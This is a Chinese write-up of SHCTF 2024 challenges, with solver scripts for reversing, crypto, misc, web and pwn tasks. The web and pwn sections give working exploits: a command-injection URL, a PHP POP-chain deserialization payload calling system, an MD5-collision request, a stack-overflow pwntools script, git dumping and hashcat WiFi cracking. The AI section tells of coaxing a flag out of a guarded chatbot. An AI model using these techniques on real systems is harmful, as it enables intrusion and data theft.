re

gamegame

玩游戏也能签到??(本题的flag格式为:shctf{*})

数独,解就完事了,flag是填充的数

image-20241003160743137

import copy

non_puzzle = [
    [5, 3, 0, 0, 7, 0, 0, 0, 0],
    [6, 0, 0, 1, 9, 5, 0, 0, 0],
    [0, 9, 8, 0, 0, 0, 0, 6, 0],
    [8, 0, 0, 0, 6, 0, 0, 0, 3],
    [4, 0, 0, 8, 0, 3, 0, 0, 1],
    [7, 0, 0, 0, 2, 0, 0, 0, 6],
    [0, 6, 0, 0, 0, 0, 2, 8, 0],
    [0, 0, 0, 4, 1, 9, 0, 0, 5],
    [0, 0, 0, 0, 8, 0, 0, 7, 9]
]

puzzle = copy.deepcopy(non_puzzle)

def is_valid_move(puzzle, row, col, num):
    if num in puzzle[row]:
        return False
    if num in [puzzle[r][col] for r in range(9)]:
        return False
    start_row, start_col = 3 * (row // 3), 3 * (col // 3)
    for i in range(3):
        for j in range(3):
            if puzzle[start_row + i][start_col + j] == num:
                return False
    return True

def solve_sudoku(puzzle):
    for row in range(9):
        for col in range(9):
            if puzzle[row][col] == 0:
                for num in range(1, 10):
                    if is_valid_move(puzzle, row, col, num):
                        puzzle[row][col] = num
                        if solve_sudoku(puzzle):
                            return True
                        puzzle[row][col] = 0
                return False
    return True


solve_sudoku(puzzle)

for i in range(len(non_puzzle)):
    for j in range(len(non_puzzle[i])):
        if non_puzzle[i][j] == 0:
            print(puzzle[i][j],end="")

ezxor

又来做逆向拉,xor来咯。

enc

注意strcpy(v10, "o");是两字节,\0结尾

image-20241003160808539

enc=[-61,105,114,-60,103,74,-24,17,67,-49,111,0,-13,68,110,-8,89,73,-24,78,94,-30,83,67,-79,92]
flag=""
for i in range(26):
    if i%3==1:
        flag += chr((enc[i] ^ 0x21)%256)
    elif i%3==2:
        flag += chr((enc[i] ^ 0x31)%256)
    else:
        flag += chr((enc[i] ^ 0x90)%256)
print(flag)

SHCTF{x0r_N0ce_hxxxoorrr!}

ezrc4

又到了新生们最最最最喜欢的rc4了!对称算法?好简单嘞!

v4数组enc,v5数组key,flag长度21

image-20241003161415380

变种rc4,多异或了一个0x66

image-20241003185626532

解密

image-20241003190324308

ezapk

apk?秒啦 (flag格式为:SHCTF{*})

enc

image-20241003194551175

key

image-20241003194615776

加密过程

image-20241003214438764

import base64

encoded_str = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
key=[12, 15, 25, 30, 36]
flag=""

enc = base64.b64decode(encoded_str).decode('utf-8')
for i in range(len(enc)):
    flag+=chr(((ord(enc[i])>>1)-6)^key[i%5])
print(flag)

EzDBG

题目描述: 一句话的意义在听者的心里,常像一只陌生的猫到屋里来,声息全无,直到“喵~”的一叫,你才发觉它的存在。

[10.03-16:35] 已更新为降低难度的附件

尝试找到EzDBG模块中的main函数

导入pdb

.sympath <pdb目录>

找到main函数地址

image-20241008234102367

查看汇编,简单异或

    EzDBG!main:
00007ff6`d4f31a10 4055           push    rbp
00007ff6`d4f31a12 57             push    rdi
00007ff6`d4f31a13 4881ec58010000 sub     rsp, 158h
00007ff6`d4f31a1a 488d6c2420     lea     rbp, [rsp+20h]
00007ff6`d4f31a1f 488d7c2420     lea     rdi, [rsp+20h]
00007ff6`d4f31a24 b91e000000     mov     ecx, 1Eh
00007ff6`d4f31a29 b8cccccccc     mov     eax, 0CCCCCCCCh
00007ff6`d4f31a2e f3ab           rep stos dword ptr [rdi]
00007ff6`d4f31a30 488b0509b60000 mov     rax, qword ptr [EzDBG!__security_cookie{.value} (7ff6d4f3d040)]
00007ff6`d4f31a37 4833c5         xor     rax, rbp
00007ff6`d4f31a3a 48898528010000 mov     qword ptr [rbp+128h], rax
00007ff6`d4f31a41 488d0d1e060100 lea     rcx, [EzDBG!__0BF6D801_EzDBG@cpp (7ff6d4f42066)]
00007ff6`d4f31a48 e837f9ffff     call    EzDBG!@ILT+895(__CheckForDebuggerJustMyCode) (7ff6d4f31384)
00007ff6`d4f31a4d 90             nop     
00007ff6`d4f31a4e 488d5508       lea     rdx, [inputStr{[0]} (rbp+8)]
00007ff6`d4f31a52 488d0dcb920000 lea     rcx, [EzDBG!`string' (7ff6d4f3ad24)]
00007ff6`d4f31a59 e83df6ffff     call    EzDBG!@ILT+150(scanf) (7ff6d4f3109b)
00007ff6`d4f31a5e 90             nop     
00007ff6`d4f31a5f c7455400000000 mov     dword ptr [rbp+54h], 0
00007ff6`d4f31a66 eb08           jmp     EzDBG!main+0x60 (7ff6d4f31a70)
00007ff6`d4f31a68 8b4554         mov     eax, dword ptr [rbp+54h]
00007ff6`d4f31a6b ffc0           inc     eax
00007ff6`d4f31a6d 894554         mov     dword ptr [rbp+54h], eax
00007ff6`d4f31a70 837d5427       cmp     dword ptr [rbp+54h], 27h
00007ff6`d4f31a74 7d32           jge     EzDBG!main+0x98 (7ff6d4f31aa8)
00007ff6`d4f31a76 48634554       movsxd  rax, dword ptr [rbp+54h]
00007ff6`d4f31a7a 488d0d7fb50000 lea     rcx, [EzDBG!enc{[0]} (7ff6d4f3d000)]
00007ff6`d4f31a81 0fbe0401       movsx   eax, byte ptr [rcx+rax]
00007ff6`d4f31a85 83f066         xor     eax, 66h
00007ff6`d4f31a88 48634d54       movsxd  rcx, dword ptr [rbp+54h]
00007ff6`d4f31a8c 0fbe4c0d08     movsx   ecx, byte ptr inputStr{[0]} (rbp+8)[rcx]
00007ff6`d4f31a91 3bc1           cmp     eax, ecx
00007ff6`d4f31a93 7411           je      EzDBG!main+0x96 (7ff6d4f31aa6)
00007ff6`d4f31a95 488d0d8c920000 lea     rcx, [EzDBG!`string' (7ff6d4f3ad28)]
00007ff6`d4f31a9c e803f7ffff     call    EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31aa1 90             nop     
00007ff6`d4f31aa2 33c0           xor     eax, eax
00007ff6`d4f31aa4 eb11           jmp     EzDBG!main+0xa7 (7ff6d4f31ab7)
00007ff6`d4f31aa6 ebc0           jmp     EzDBG!main+0x58 (7ff6d4f31a68)
00007ff6`d4f31aa8 488d0d91920000 lea     rcx, [EzDBG!`string' (7ff6d4f3ad40)]
00007ff6`d4f31aaf e8f0f6ffff     call    EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31ab4 90             nop     
00007ff6`d4f31ab5 33c0           xor     eax, eax
00007ff6`d4f31ab7 488bf8         mov     rdi, rax
00007ff6`d4f31aba 488d4de0       lea     rcx, [rbp-20h]
00007ff6`d4f31abe 488d153b920000 lea     rdx, [EzDBG!__xt_z[76] (7ff6d4f3ad00)]
00007ff6`d4f31ac5 e856f8ffff     call    EzDBG!@ILT+795(_RTC_CheckStackVars) (7ff6d4f31320)
00007ff6`d4f31aca 488bc7         mov     rax, rdi
00007ff6`d4f31acd 488b8d28010000 mov     rcx, qword ptr [rbp+128h]
00007ff6`d4f31ad4 4833cd         xor     rcx, rbp
00007ff6`d4f31ad7 e8e1f6ffff     call    EzDBG!@ILT+440(__security_check_cookie) (7ff6d4f311bd)
00007ff6`d4f31adc 488da538010000 lea     rsp, [rbp+138h]
00007ff6`d4f31ae3 5f             pop     rdi
00007ff6`d4f31ae4 5d             pop     rbp
00007ff6`d4f31ae5 c3             ret     

enc

image-20241008234156984

解密脚本

# 密文(用十六进制表示)
ciphertext = [
    0x35, 0x2E, 0x25, 0x32, 0x20, 0x1D, 0x03, 0x5E, 0x07, 0x56, 0x00, 0x03,
    0x57, 0x57, 0x53, 0x50, 0x00, 0x54, 0x07, 0x00, 0x07, 0x07, 0x00, 0x03,
    0x50, 0x02, 0x51, 0x5E, 0x5E, 0x03, 0x5F, 0x02, 0x56, 0x03, 0x57, 0x00,
    0x50, 0x50, 0x1B
]
# 异或密钥
xor_key = 0x66

# 解密函数
def decrypt(ciphertext, key):
    plaintext = ''.join(chr(byte ^ key) for byte in ciphertext)
    return plaintext

# 调用解密函数
decrypted_message = decrypt(ciphertext, xor_key)
print("解密后的信息:", decrypted_message)

web

1zflask

题目描述: robots有什么用呢?

image-20241004182619634

访问/s3recttt,拿到源码

import os
import flask
from flask import Flask, request, send_from_directory, send_file

app = Flask(__name__)

@app.route('/api')
def api():
    cmd = request.args.get('SSHCTFF', 'ls /')
    result = os.popen(cmd).read()
    return result
    
@app.route('/robots.txt')
def static_from_root():
    return send_from_directory(app.static_folder,'robots.txt')
    
@app.route('/s3recttt')
def get_source():
    file_path = "app.py"
    return send_file(file_path, as_attachment=True)
 
if __name__ == '__main__':
    app.run(debug=True)

/api?SSHCTFF=cat /flag

image-20241004183017777

单身十八年的手速

题目描述: 点击就送flag

连点器

image-20241004183159211

image-20241004183247987

蛐蛐?蛐蛐!

题目描述: 尊敬的web手!请帮不想出题的fault蛐蛐某某某某,并将蛐蛐变为现实

image-20241004183628998

image-20241004183611926

<?php
if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
    if($_POST['ququ']!=null){
        $eval_param = $_POST['ququ'];
        if(strncmp($eval_param,'ququk1',6)===0){
            eval($_POST['ququ']);
        }else{
            echo("可以让fault的蛐蛐变成现实么\n");
        }
    }
    echo("蛐蛐成功第一步!\n");

}
else{
    echo("呜呜呜fault还是要出题");
}

$_GET['ququ'] == 114514弱比较

image-20241004195536870

MD5 Master

题目描述: 你是 MD5 大师吗?

<?php
highlight_file(__file__);

$master = "MD5 master!";

if(isset($_POST["master1"]) && isset($_POST["master2"])){
    if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
        echo $master . "<br>";
        echo file_get_contents('/flag');
    }
}
else{
    die("master? <br>");
}

image-20241004212119269

php编码

image-20241004212254331

bp发包

master1=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%1Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%89%1F%96P%E9%3EV%EE%05%26N%E3%B4%06S%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3%C4%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%81%D9%D4N%E4&master2=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%9Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%09+%96P%E9%3EV%EE%05%26N%E3%B4%06%D3%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC%B1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3D%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%01%D9%D4N%E4

image-20241004212232461

ez_gittt

题目描述: 什么?竟然有人愿意把自己的秘密公开!!!???

直奔/.git路由

image-20241004195821372

githacker dump下/.git

githacker --url http://entry.shc.tf:44345/.git/ --output-folder result

查看日志

git log
git diff 554c928b2f67c9cd7d283706de161e6740c447a8

image-20241004223315739

poppopop

题目描述: 简单的pop

源码

<?php
class SH {

    public static $Web = false;
    public static $SHCTF = false;
}
class C {
    public $p;

    public function flag()
    {
        ($this->p)();
    }
}
class T{

    public $n;
    public function __destruct()
    {

        SH::$Web = true;
        echo $this->n;
    }
}
class F {
    public $o;
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
class SHCTF {
    public $isyou;
    public $flag;
    public function __invoke()
    {
        if (SH::$Web) {

            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}
if (isset($_GET['data'])) {
    highlight_file(__FILE__);
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
    echo "小丑离我远点!!!";
}

梭哈

<?php
class SH {

    public static $Web = false;
    public static $SHCTF = false;
}
class C {
    public $p;

    public function flag()
    {
        ($this->p)();
    }
}
class T{

    public $n;
    public function __destruct()
    {

        SH::$Web = true;
        echo $this->n;
    }
}
class F {
    public $o;
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
class SHCTF {
    public $isyou;
    public $flag;
    public function __invoke()
    {
        if (SH::$Web) {

            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}
$a=new SHCTF();
$a->isyou='system';
$a->flag='cat /flllag';
$b=new C();
$b->p=$a;
$c=new F();
$c->o=$b;
$d=new T();
$d->n=$c;
echo base64_encode(serialize($d));

image-20241004225657129

GET传参

image-20241004225740613

jvav

题目描述: vavj

import java.io.*;

public class demo{
    public static void main(String[] args) {
        try {
            ProcessBuilder builder = new ProcessBuilder("sh", "-c", "cat /flag");
            Process process = builder.start();
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
            process.waitFor();
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
    }
}

pwn

签个到吧

题目描述: close nc

过滤,1s执行

image-20241004182727905

image-20241004182249533

No stack overflow1

题目描述: stack overflow? 我写了一个简单的checker来判断是否存在栈溢出,这个checker是否合理??

strlen,\x00绕过

image-20241006183419319

from pwn import*

p=remote("entry.shc.tf",21687)
p.recvline()
shelladrress=0x4011DE
payload=b'\x00'*0x117+p64(shelladrress)
p.sendline(payload)
p.interactive()

misc

真真假假?遮遮掩掩!

题目描述: 假的就是假的,真的就是真的,遮遮掩掩的有什么用!

题目名提示伪加密,标志位改0

image-20241005025638996

打不开flag.txt,还有加密

如下注释给了密码提示

image-20241005024834279

爆破密码SHCTF202410FTCHS

image-20241005025821045

SHCTF{C0ngr@tu1at1ons_On_Mast3r1ng_mAsk_aTT@ck5!}

拜师之旅①

题目描述: 一年一度的洛琪希美照大赏开始了,正好Nanian233下周要去拜师pngMaster, 参加入门考试. 就拿这个先练练手吧

缺png头

image-20241005023520675

image-20241005023657947

改宽高

import zlib
import struct
import  binascii


file = 'roxy.png'
fr = open(file,'rb').read()
data = bytearray(fr[12:29])

#crc32key = eval(str(fr[29:33]).replace('\\x','').replace("b'",'0x').replace("'",'')) 
crc32key = struct.unpack('>I',fr[29:33])[0]&0xffffffff 
print(crc32key)
#data = bytearray(b'\x49\x48\x44\x52\x00\x00\x01\xF4\x00\x00\x01\xF1\x08\x06\x00\x00\x00') 
n = 4096
for w in range(n): 
    width = bytearray(struct.pack('>i', w))
    for h in range(n): 
        height = bytearray(struct.pack('>i', h)) 
        for x in range(4): 
            data[x+4] = width[x] 
            data[x+8] = height[x] 
            #print(data) 
        crc32result = zlib.crc32(data) 
        if crc32result == crc32key:
            print(crc32key) 
            print(width,height) 
            print(data) 
            newpic = bytearray(fr) 
            for x in range(4): 
                newpic[x+16] = width[x]
                newpic[x+20] = height[x] 
            fw = open(file+'.png','wb') 
            fw.write(newpic) 
            fw.close

roxy.png

有WiFi干嘛不用呢?

题目描述: k1每次来陪睡都要连WiFi,请帮他获取该wifi密码。flag提交方式:SHCTF{WiFi密码}。

前段时间做moectf的re题正好遇到wifi流量破解

这题给了may文件夹,看文件名和文件内容大概率是密码

提取一下

import os

folder_path = r'./may'
output_file = 'passwd.txt'

with open(output_file, 'w', encoding='utf-8') as f:
    for filename in os.listdir(folder_path):
        file_path = os.path.join(folder_path, filename)
        if os.path.isfile(file_path):
            f.write(f'{filename}\n')
            with open(file_path, 'r', encoding='utf-8') as file:
                content = file.read()

                f.write(f'{content[1:-2]}\n')

hashcat hcxpcapngtool - advanced password recovery转一下

image-20241005033030439

字典爆破

./hashcat -m 22000 -a 0 2165215_1728068768.hc22000 passwd.txt

image-20241005032704537

Rasterizing Traffic

题目描述: Man! What can I say!!!

分析流量包,也就一个png比较明显了

image-20241005033518342

导出,多余删掉

image-20241005033808822

png

光栅

from PIL import Image
import numpy as np

for j in range(5):
    img = Image.open('.png').convert('L')
    width, height = img.size
    img_data = np.array(img)
    start = 1
    interval = 5
    start+=j
    for i in range(start, width, interval):
        img_data[:, i:i + interval - 1] = 0
    Image.fromarray(img_data)

    new_image = Image.fromarray(img_data)
    new_image.save(f'./ouput/{j}.png')

image-20241005040834419

SHCTF{1111z_tr@ff1c_aNaLys13}

crypto

EzAES

题目描述: 最最简单的AES

源码

from Crypto.Cipher import AES
import os

iv = os.urandom(16)
key = os.urandom(16)
my_aes = AES.new(key, AES.MODE_CBC, iv)
flag = open('flag.txt', 'rb').read()
flag += (16 - len(flag) % 16) * b' '
c = my_aes.encrypt(flag)
print(c)
print(iv)
print(key)
'''
b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'
b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'
b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'

解密

from Crypto.Cipher import AES


key = b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'
iv = b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'


my_aes_decrypt = AES.new(key, AES.MODE_CBC, iv)

ciphertext = b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'

plaintext = my_aes_decrypt.decrypt(ciphertext)

plaintext = plaintext.rstrip(b' ')

print(plaintext)

Hello Crypto

题目描述: 你好,现代密码学

源码

from Crypto.Util.number import bytes_to_long
from secret import flag

m = bytes_to_long(flag)
print("m =",m)

# In cryptography, m stands for message, also plaintext
# so, why this m is number?
# decrypt this Message to get flag!
# m = 215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781

我真的哭死,第一次遇到能让我不用ai直接手搓出来的题呜呜呜

解密脚本

from Crypto.Util.number import*

m=215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781
flag=long_to_bytes(m)
print(flag)

factor

factor and combination

yafu分解

.\yafu-x64.exe "factor(202684025069666122928943870473693390943999154246475102682928603649889979837891808145761938294210543968287387118675294961417296597826107898446066891091139992043145111792866874820404982180534411)"

image-20241006210945606

gpt梭哈

from itertools import combinations
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long

# 给定的质数列表(从 N 的分解得到的)
prime_list = [
    18382585067038096651,
    14840413069428752761,
    9845968710564320221,
    11985382012119355663,
    16974023387369024819,
    15073937162523269353,
    15879874287378916289,
    12489385236654944237,
    11580488510409206699,
    10713468965251790263
]

# 给定的密文和公钥指数 e
c = 74957645771347063156084390560511541272461735783664273246902636936377661944639588841276568374009308588456113421628518882519406151899764
e = 65537

# 1. 尝试组合7个质数并计算 n 和 phi(n)
for p_list in combinations(prime_list, 7):
    n = 1
    for p in p_list:
        n *= p

    # 计算 phi(n)
    phi_n = 1
    for p in p_list:
        phi_n *= (p - 1)

    # 2. 计算私钥 d
    d = inverse(e, phi_n)

    # 3. 尝试解密密文
    try:
        m = pow(c, d, n)
        flag = long_to_bytes(m)
        if b'CTF{' in flag:  # 检查 flag 格式
            print(f"解密成功: {flag}")
            break
    except ValueError:
        continue

image-20241006211828512

baby_mod

题目描述: 模 = mod

题目源码

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
r = getPrime(777)
t = getPrime(777)
tmp = getPrime(15)
e = 65537
n = p*q
print(f"c = {pow(m,e,n)}")
print(f"leak = {p*r-q*t-tmp}")
print(f"r = {r}")
print(f"t = {t}")
'''
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
'''

p*r-q*t-tmp搜到SRCTF2024-baby极为相似

找了几位师傅的脚本试了试,最后利用了DexterJie师傅的脚本SRCTF | DexterJie’Blog

正负都没改,直接替换了值,竟然能直接出结果,虽然不理解,但极为震撼

from Crypto.Util.number import *

c = -69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317

Ge = Matrix(ZZ,[
    [leak,0,0,0],
    [r,1,0,0],
    [t,0,1,0],
    [-1,0,0,2^500]
])

Ge[:,0] *= 2^2000

for line in Ge.LLL():
    if line[0] == 0:
        p,q = abs(line[1]),abs(line[2])
        n = p * q
        d = inverse(65537,(p-1)*(q-1))
        m = pow(c,d,n)
        print(long_to_bytes(m))
        # SRCTF{0896649c53c145919ce741f180957834}

image-20241009001828715

有意思的是,另一位师傅的代码最后也跑出来了

image-20241009032235778

import itertools


def small_roots(f, bounds, m=1, d=None):  # 多元copper
    if not d:
        d = f.degree()
    R = f.base_ring()
    N = R.cardinality()
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)
    G = Sequence([], f.parent())
    for i in range(m + 1):
        base = N ^ (m - i) * f ^ i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)
    B = B.dense_matrix().LLL()
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots
    return []

c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317

R.<p,q> = Zmod(leak)[]
for tmp in range(2 ^ 14,  2 ^ 15):
    f = p*r-q*t-tmp
    res = small_roots(f, bounds=(2 ^ 512, 2 ^ 512), m=3, d=2)
    if res:
        print(res)
        break

就是跑得挺久,毕竟是2的14次方

from Crypto.Util.number import inverse, long_to_bytes

# 提供的素数和密文
p=11799365899073049527038222991817294163432468116739044155324163062605081459516948129587956698210751311282285532041297993219199812623993179858635079156564471
q=7920780147742343919802692215442217736320564739726806695299813117512855265349275493667659977160207404159832804023039365285757320911861469820804465066706263
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446

# RSA 参数
n = p * q
phi_n = (p - 1) * (q - 1)
e = 65537  # 公钥指数,通常是这个值

# 计算私钥 d
d = inverse(e, phi_n)

# 解密
m = pow(c, d, n)

# 将解密后的长整型转换为字节
flag = long_to_bytes(m)

print("解密后的 flag:", flag.decode())

AI

小助手

这里有一只可爱的小助手,生蚝给了他一个神秘的小flag,你如果忍心抢走flag,ta会受到惩罚的,不要抢走flag好不好/(ㄒoㄒ)/~~

这玩意就看命

image-20241005021122760

一般nc连接第一次成功可能性比较大(可能刚初始化)

image-20241005021047128

中间还爆出过这个,可能是对结果进行检测过滤吧

屏幕截图 2024-10-05 012541

区块链

just Signin

赶时间出的,非预期做起来会很简单

Sepolia Address: 0x3948DF4C50B1671eaa6b22876Ea746899a6916C1

What is a Blockchain Explorer? Focus on input data

Sepolia Transaction Hash (Txhash) Details | Etherscan

bytecode

image-20241006203501613